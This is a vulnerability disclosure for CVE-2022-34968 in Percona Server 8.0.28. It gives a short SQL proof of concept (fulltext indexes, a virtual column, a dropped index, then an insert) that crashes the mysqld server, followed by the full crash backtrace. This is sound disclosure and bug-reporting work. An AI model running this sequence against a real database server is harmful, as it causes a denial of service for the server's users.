CVE-2022-34968: [PS-8294] Server crashed at function fetch_step(que_thr_t*)

PoC:

CREATE TABLE t1 (a SERIAL, t TEXT, FULLTEXT f1(t), FULLTEXT f2(t)) ENGINE=InnoDB; INSERT INTO t1 (a,t) VALUES (1,’1’),(2,’1’); ALTER TABLE t1 ADD COLUMN g TEXT GENERATED ALWAYS AS (t) VIRTUAL; DELETE FROM t1 WHERE a = 1; ALTER TABLE t1 DROP INDEX f1; INSERT INTO t1 (a,t) VALUES (1,’1’);

Server report:

Build ID: 18aaa142649c55cdd3da3a4b5bea39fe4cc9a679 Server Version: 8.0.28-19 Percona Server (GPL), Release 19, Revision 31e88966cd3Thread pointer: 0x7f919c000fc0 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong… stack_bottom = 7f920c6f6d50 thread_stack 0x100000 /usr/sbin/mysqld(my_print_stacktrace(unsigned char const*, unsigned long)+0x41) [0x20cbe11] /usr/sbin/mysqld(print_fatal_signal(int)+0x323) [0x11506e3] /usr/sbin/mysqld(handle_fatal_signal+0xbd) [0x11507ad] /lib64/libpthread.so.0(+0x12cf0) [0x7f9226022cf0] /usr/sbin/mysqld() [0x256590c] /usr/sbin/mysqld() [0x2568c31] /usr/sbin/mysqld(fetch_step(que_thr_t*)+0xde) [0x233020e] /usr/sbin/mysqld(que_run_threads(que_thr_t*)+0x498) [0x22dc888] /usr/sbin/mysqld(fts_eval_sql(trx_t*, que_fork_t*)+0x31) [0x2586e71] /usr/sbin/mysqld(fts_doc_fetch_by_doc_id(fts_get_doc_t*, unsigned long, dict_index_t*, unsigned long, unsigned long (*)(void*, void*), void*)+0xec) [0x2564d4c] /usr/sbin/mysqld(fts_init_index(dict_table_t*, unsigned long)+0x1b1) [0x256eac1] /usr/sbin/mysqld(fts_init_doc_id(dict_table_t const*)+0xed) [0x256ee3d] /usr/sbin/mysqld(fts_get_next_doc_id(dict_table_t const*, unsigned long*)+0xe5) [0x25709f5] /usr/sbin/mysqld(fts_create_doc_id(dict_table_t*, dtuple_t*, mem_block_info_t*)+0x8f) [0x2570a9f] /usr/sbin/mysqld() [0x2302e84] /usr/sbin/mysqld(ha_innobase::write_row(unsigned char*)+0x339) [0x21dad79] /usr/sbin/mysqld(handler::ha_write_row(unsigned char*)+0x1a4) [0xcd1b34] /usr/sbin/mysqld(write_record(THD*, TABLE*, COPY_INFO*, COPY_INFO*)+0x62f) [0xfabc8f] /usr/sbin/mysqld(Sql_cmd_insert_values::execute_inner(THD*)+0xa35) [0xfad7a5] /usr/sbin/mysqld(Sql_cmd_dml::execute(THD*)+0x186) [0x104b7c6] /usr/sbin/mysqld(mysql_execute_command(THD*, bool)+0xa10) [0xfe2d20] /usr/sbin/mysqld(Prepared_statement::execute(String*, bool)+0x898) [0x10157c8] /usr/sbin/mysqld(Prepared_statement::execute_loop(String*, bool)+0x12e) [0x101a47e] /usr/sbin/mysqld(mysqld_stmt_execute(THD*, Prepared_statement*, bool, unsigned long, PS_PARAM*)+0x1b1) [0x101aad1] /usr/sbin/mysqld(dispatch_command(THD*, COM_DATA const*, enum_server_command)+0x2692) [0xfe96d2] /usr/sbin/mysqld(do_command(THD*)+0x18d) [0xfea05d] /usr/sbin/mysqld() [0x1140420] /usr/sbin/mysqld() [0x25f7ef4] /lib64/libpthread.so.0(+0x81df) [0x7f92260181df] /lib64/libc.so.6(clone+0x43) [0x7f92243bcd83]Trying to get some variables. Some pointers may be invalid and cause the dump to abort. Query (7f919c00aeb0): INSERT INTO t1 (a,t) VALUES (1,’1’) Connection ID (thread ID): 8 Status: NOT_KILLEDPlease help us make Percona Server better by reporting any bugs at https:http:in the manual which will help you identify the cause of the crash.